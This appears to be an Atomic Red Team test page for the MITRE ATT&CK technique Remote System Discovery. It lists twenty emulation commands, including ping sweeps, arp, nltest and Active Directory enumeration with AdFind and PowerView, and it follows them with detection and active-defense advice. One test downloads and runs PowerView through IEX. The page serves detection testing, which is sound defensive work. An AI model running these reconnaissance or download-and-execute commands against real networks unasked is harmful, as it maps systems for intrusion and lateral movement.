# T1018 - Remote System Discovery
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039).

Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.

Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)  


## Atomic Tests

### Atomic Test #1 - Remote System Discovery - net
Identify remote systems with net.exe.

Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled.

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
net view /domain
net view
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 1

### Atomic Test #2 - Remote System Discovery - net group Domain Computers
Identify remote systems with net.exe querying the Active Directory Domain Computers group.

Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
net group "Domain Computers" /domain
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 2

### Atomic Test #3 - Remote System Discovery - nltest
Identify domain controllers for specified domain.

Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
nltest.exe /dclist:%userdnsdomain%
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 3

### Atomic Test #4 - Remote System Discovery - ping sweep
Identify remote systems via ping sweep.

Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i  
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 4

### Atomic Test #5 - Remote System Discovery - arp
Identify remote systems via arp. 

Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
arp -a
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 5

### Atomic Test #6 - Remote System Discovery - arp nix
Identify remote systems via arp.

Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.

**Supported Platforms:** linux, macos
#### Dependencies:  Run with `sh`!
##### Description: Check if arp command exists on the machine

##### Check Prereq Commands:
```sh
if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
(which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)

```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
arp -a | grep -v '^?'
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 6

### Atomic Test #7 - Remote System Discovery - sweep
Identify remote systems via ping sweep.

Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.

**Supported Platforms:** linux, macos
#### Attack Commands: Run with `sh`
```sh
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 7

### Atomic Test #8 - Remote System Discovery - nslookup
Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig.

Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`
```powershell
$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
$secondOctet = $pieces[1]
$thirdOctet = $pieces[2]
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 8

### Atomic Test #9 - Remote System Discovery - adidnsdump
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks
Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will list dns zones in the terminal.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Computer must have python 3 installed

##### Check Prereq Commands:
```powershell
if (python --version) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
echo "Python 3 must be installed manually"

```
##### Description: Computer must have pip installed

##### Check Prereq Commands:
```powershell
if (pip3 -V) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
echo "PIP must be installed manually"

```
##### Description: adidnsdump must be installed and part of PATH

##### Check Prereq Commands:
```powershell
if (cmd /c adidnsdump -h) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
pip3 install adidnsdump

```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 9 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
adidnsdump -u domain\user -p password --print-zones 192.168.1.1
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 9

### Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1087.002\src\AdFind.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile PathToAtomicsFolder\T1087.002\src\AdFind.exe

```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 10 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
PathToAtomicsFolder\T1087.002\src\AdFind.exe -f (objectcategory=computer)
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 10

### Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1087.002\src\AdFind.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile PathToAtomicsFolder\T1087.002\src\AdFind.exe

```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 11 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
PathToAtomicsFolder\T1087.002\src\AdFind.exe -sc dclist
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 11

### Atomic Test #12 - Remote System Discovery - ip neighbour
Use the ip neighbour command to display the known link layer (ARP table) addresses for hosts sharing the same network segment. 

**Supported Platforms:** linux
#### Dependencies:  Run with `sh`!
##### Description: Check if ip command exists on the machine

##### Check Prereq Commands:
```sh
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
apt-get install iproute2 -y

```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 12 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
ip neighbour show
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 12

### Atomic Test #13 - Remote System Discovery - ip route
Use the ip route command to display the kernels routing tables. 

**Supported Platforms:** linux
#### Dependencies:  Run with `sh`!
##### Description: Check if ip command exists on the machine

##### Check Prereq Commands:
```sh
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
apt-get install iproute2 -y

```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 13 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
ip route show
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 13

### Atomic Test #14 - Remote System Discovery - ip tcp_metrics
Use the ip tcp_metrics command to display the recent cached entries for IPv4 and IPv6 source and destination addresses. 

**Supported Platforms:** linux
#### Dependencies:  Run with `sh`!
##### Description: Check if ip command exists on the machine

##### Check Prereq Commands:
```sh
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
apt-get install iproute2 -y

```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 14 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
ip tcp_metrics show |grep --invert-match "^127\."
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 14

### Atomic Test #15 - Enumerate domain computers within Active Directory using DirectorySearcher
This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain. 
This test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement. 
Reference: [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks). 
Upon successful execution, this test will output the names of the computers that reside on the domain to the console window. 

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: This PC must be joined to a domain.
##### Check Prereq Commands:
```powershell
if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
write-host "This PC must be manually added to a domain." 
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 15 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
$DirectorySearcher.PropertiesToLoad.Add("Name")
$Computers = $DirectorySearcher.findall()
foreach ($Computer in $Computers) {
  $Computer = $Computer.Properties.name
  if (!$Computer) { Continue }
  Write-Host $Computer}
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 15

### Atomic Test #16 - Enumerate Active Directory Computers with Get-AdComputer
The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
Upon successful execution a listing of Computers will output with their paths in AD.
Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
Get-AdComputer -Filter *
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 16

### Atomic Test #17 - Enumerate Active Directory Computers with ADSISearcher
The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
Upon successful execution a listing of computers will output with their paths in AD.
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 17

### Atomic Test #18 - Get-DomainController with PowerView
Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 18

### Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers
The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
Upon successful execution a listing of Systems from AD will output with their paths.
Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
get-wmiobject -class ds_computer -namespace root\directory\ldap
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 19

### Atomic Test #20 - Remote System Discovery - net group Domain Controller
Identify remote systems with net.exe querying the Active Directory Domain Controller.
Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Controller" in the domain. Output will be via stdout.

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
net group /domain "Domain controllers"
```

In [ ]:
Invoke-AtomicTest T1018 -TestNumbers 20

## Detection
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).

Monitor for processes that can be used to discover remote systems, such as <code>ping.exe</code> and <code>tracert.exe</code>, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)

## Shield Active Defense
### Software Manipulation 
 Make changes to a system's software properties and functions to achieve a desired effect. 

 Software Manipulation allows a defender to alter or replace elements of the operating system, file system, or any other software installed and executed on a system.
#### Opportunity
There is an opportunity for the defender to observe the adversary and control what they can see, what effects they can have, and/or what data they can access.
#### Use Case
A defender can change the output of a recon commands to hide simulation elements you don’t want attacked and present simulation elements you want the adversary to engage with.
#### Procedures
Hook the Win32 Sleep() function so that it always performs a Sleep(1) instead of the intended duration. This can increase the speed at which dynamic analysis can be performed when a normal malicious file sleeps for long periods before attempting additional capabilities.
Hook the Win32 NetUserChangePassword() and modify it such that the new password is different from the one provided. The data passed into the function is encrypted along with the modified new password, then logged so a defender can get alerted about the change as well as decrypt the new password for use.
Alter the output of an adversary's profiling commands to make newly-built systems look like the operating system was installed months earlier.
Alter the output of adversary recon commands to not show important assets, such as a file server containing sensitive data.